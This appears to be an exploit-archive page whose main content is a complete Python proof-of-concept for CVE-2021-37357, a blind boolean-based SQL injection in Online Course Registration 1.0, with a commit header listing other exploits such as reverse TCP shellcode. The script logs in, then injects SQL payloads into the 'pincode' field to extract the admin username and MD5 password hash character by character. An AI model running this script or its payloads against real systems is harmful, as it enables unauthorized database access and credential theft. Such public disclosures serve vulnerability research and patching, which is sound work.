4f2cf56b31
11 changes to exploits/shellcodes Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection OpenSIS 8.0 'modname' - Directory Traversal Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload Budget and Expense Tracker System 1.0 - Arbitrary File Upload FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting Jetty 9.4.37.v20210219 - Information Disclosure Clinic Management System 1.0 - SQL injection to Remote Code Execution Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
116 lines
No EOL
6.2 KiB
Text
116 lines
No EOL
6.2 KiB
Text
# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
|
|
# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
|
|
# Date: 2021-10-21
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 + XAMPP + Python 3
|
|
|
|
# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
|
|
# with access to the username and md5 hash of any administrators.
|
|
# Vulnerable file: /online-course-registration/Online/pincode-verification.php
|
|
# Proof of Concept:
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import requests
|
|
import sys
|
|
import string
|
|
|
|
def exploit(hostname, username, password):
|
|
|
|
# Building bruteforce list
|
|
pass_list = list(string.ascii_lowercase)
|
|
pass_list += list(range(0,10))
|
|
pass_list = map(str, pass_list)
|
|
pass_list = list(pass_list)
|
|
|
|
user_list = pass_list
|
|
user_list += list(string.ascii_uppercase)
|
|
user_list = map(str, user_list)
|
|
user_list = list(user_list)
|
|
|
|
session = requests.Session()
|
|
|
|
# This URL may change based on the implementation - change as needed
|
|
url = f"{hostname}/online-course-registration/Online/index.php"
|
|
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
|
|
data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
|
|
r = session.post(url, headers=headers, data=data)
|
|
|
|
|
|
print("Admin username:")
|
|
# This range number is pretty arbitrary, so change it to whatever you feel like
|
|
for i in range(1,33):
|
|
counter = 0
|
|
find = False
|
|
for j in user_list:
|
|
# This URL may change based on the implementation - change as needed
|
|
url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
|
|
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
|
|
data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
|
|
a = session.post(url, headers=headers, data=data)
|
|
counter += 1
|
|
if 'Course Enroll' in a.text:
|
|
sys.stdout.write(j)
|
|
sys.stdout.flush()
|
|
break
|
|
elif counter == len(user_list):
|
|
find = True
|
|
break
|
|
if find:
|
|
break
|
|
|
|
print("\n")
|
|
print("Admin password hash:")
|
|
# This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
|
|
for i in range(1,33):
|
|
counter = 0
|
|
find = False
|
|
for j in pass_list:
|
|
url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
|
|
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
|
|
data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
|
|
a = session.post(url, headers=headers, data=data)
|
|
counter += 1
|
|
if 'Course Enroll' in a.text:
|
|
sys.stdout.write(j)
|
|
sys.stdout.flush()
|
|
break
|
|
elif counter == len(pass_list):
|
|
find = True
|
|
break
|
|
if find:
|
|
break
|
|
|
|
print("\n\nSuccessfully pwnd :)")
|
|
|
|
def logo():
|
|
art = R'''
|
|
__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__
|
|
_\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__
|
|
_\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__
|
|
_\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__
|
|
_\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__
|
|
_\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__
|
|
_\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__
|
|
_\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_
|
|
_\///______________\///////////__\///_____\/////__________\///////\//__
|
|
'''
|
|
info = 'CVE-2021-37357 PoC'.center(76)
|
|
credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
|
|
print(f"{art}\n{info}\n{credits}")
|
|
|
|
def main():
|
|
logo()
|
|
hostname = sys.argv[1]
|
|
username = sys.argv[2]
|
|
password = sys.argv[3]
|
|
|
|
if len(sys.argv) != 4:
|
|
print("Usage: python3 exploit.py http://127.0.0.1:80 username password")
|
|
|
|
exploit(hostname, username, password)
|
|
|
|
if __name__ == '__main__':
|
|
main() |